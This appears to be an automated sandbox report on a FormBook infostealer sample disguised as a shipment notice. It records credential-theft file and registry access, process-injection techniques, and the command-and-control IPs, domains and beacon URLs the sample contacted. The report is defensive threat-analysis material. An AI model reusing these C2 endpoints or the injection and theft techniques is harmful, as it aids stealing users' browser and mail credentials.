Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\control.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 830738 Sample: Shipment_notification.exe Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 27 www.amirah.cfd 2->27 35 Snort IDS alert for network traffic 2->35 37 Malicious sample detected (through community Yara rule) 2->37 39 Antivirus detection for URL or domain 2->39 41 3 other signatures 2->41 9 Shipment_notification.exe 3 2->9         started        signatures3 process4 file5 25 C:\Users\...\Shipment_notification.exe.log, ASCII 9->25 dropped 55 Injects a PE file into a foreign processes 9->55 13 Shipment_notification.exe 9->13         started        16 Shipment_notification.exe 9->16         started        signatures6 process7 signatures8 57 Modifies the context of a thread in another process (thread injection) 13->57 59 Maps a DLL or memory area into another process 13->59 61 Sample uses process hollowing technique 13->61 63 Queues an APC in another process (thread injection) 13->63 18 explorer.exe 1 13->18 injected process9 dnsIp10 29 www.locationsbormes.com 45.114.105.2, 49707, 49708, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS China 18->29 31 carcosainvest.com 206.54.190.30, 49699, 49700, 80 WZCOM-US United States 18->31 33 9 other IPs or domains 18->33 43 System process connects to network (likely due to code injection or exploit) 18->43 45 Performs DNS queries to domains with low reputation 18->45 22 control.exe 13 18->22         started        signatures11 process12 signatures13 47 Tries to steal Mail credentials (via file / registry access) 22->47 49 Tries to harvest and steal browser information (history, passwords, etc) 22->49 51 Deletes itself after installation 22->51 53 2 other signatures 22->53
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
198.177.124.57
 www.peramid.xyz United States
395681 FINALFRONTIERVG true
206.54.190.30
 carcosainvest.com United States
40824 WZCOM-US true
154.218.155.8
 www.ywtxsm.com Seychelles
62468 VPSQUANUS true
185.27.134.217
 www.isabellagambitta.com United Kingdom
34119 WILDCARD-ASWildcardUKLimitedGB true
66.96.161.158
 www.drkathleensanders.com United States
29873 BIZLAND-SDUS true
199.59.243.223
 www.piergitarshoes.com United States
395082 BODIS-NJUS true
45.114.105.2
 www.locationsbormes.com China
136800 XIAOZHIYUN1-AS-APICIDCNETWORKUS true

Contacted Domains

Name IP Active
www.peramid.xyz 198.177.124.57 true
carcosainvest.com 206.54.190.30 true
www.piergitarshoes.com 199.59.243.223 true
www.isabellagambitta.com 185.27.134.217 true
www.ywtxsm.com 154.218.155.8 true
www.drkathleensanders.com 66.96.161.158 true
www.locationsbormes.com 45.114.105.2 true
www.emagrecarapido.store unknown unknown
www.tcatelier.com unknown unknown
www.amirah.cfd unknown unknown
www.carcosainvest.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.piergitarshoes.com/rs5b/ true
  • Avira URL Cloud: malware
 unknown
http://www.peramid.xyz/rs5b/ true
  • Avira URL Cloud: malware
 unknown
http://www.ywtxsm.com/rs5b/ true
  • Avira URL Cloud: malware
 unknown
http://www.peramid.xyz/rs5b/?uyxvg=pPgXS4BiopaVkxB77nB8m5BmJKRgxbtyTgQ51TCNvvWiqwh2ZJ0SiqT/1xVf5TTVOW5skWvYLryZyUzfOZLrBqpWBEotOTgmwg==&L6HRe=HinkmsLDjhA true
  • Avira URL Cloud: malware
 unknown
http://www.drkathleensanders.com/rs5b/ true
  • Avira URL Cloud: malware
 unknown
http://www.locationsbormes.com/rs5b/?uyxvg=5nmvRd2KsNrJ1ILohWvWv9G51OYC+JQySj/wVW5HrbzlASqN8826SlrC1uxl2FZ0KA9XHqewj3KetP3L0XT9wGstOg81NIph5g==&L6HRe=HinkmsLDjhA true
  • Avira URL Cloud: malware
 unknown
http://www.isabellagambitta.com/rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU+FR3ZDcTynpB6gZNcuxnLmHu8DrupdLy2Rvx2rp5ka04f5VlwEigsTcDnoyRb/ht4uYCIEoQzcZzfMnw==&L6HRe=HinkmsLDjhA true
  • Avira URL Cloud: phishing
 unknown
http://www.ywtxsm.com/rs5b/?uyxvg=CESO3iylK7QUfFCiUFLwHXxmSIHW1gBrGCjGxLpE4g3q3SI6yIOiTvn7qrQa9OdkrAgYihNybI2hWOHGXNYRIortSIS8Lcg0Kg==&L6HRe=HinkmsLDjhA true
  • Avira URL Cloud: malware
 unknown
http://www.drkathleensanders.com/rs5b/?uyxvg=Sr3AwP9Ski0v59cQ3JwcPDLo9I+EFZxtPOrHknZVg/8QV/fIqaYOT5hsTQMwMe6TSfps7iDWaOg2o/5pI6PYy1hDK243b9ADKw==&L6HRe=HinkmsLDjhA true
  • Avira URL Cloud: malware
 unknown
http://www.locationsbormes.com/rs5b/ true
  • Avira URL Cloud: malware
 unknown
http://www.carcosainvest.com/rs5b/ true
  • Avira URL Cloud: malware
 unknown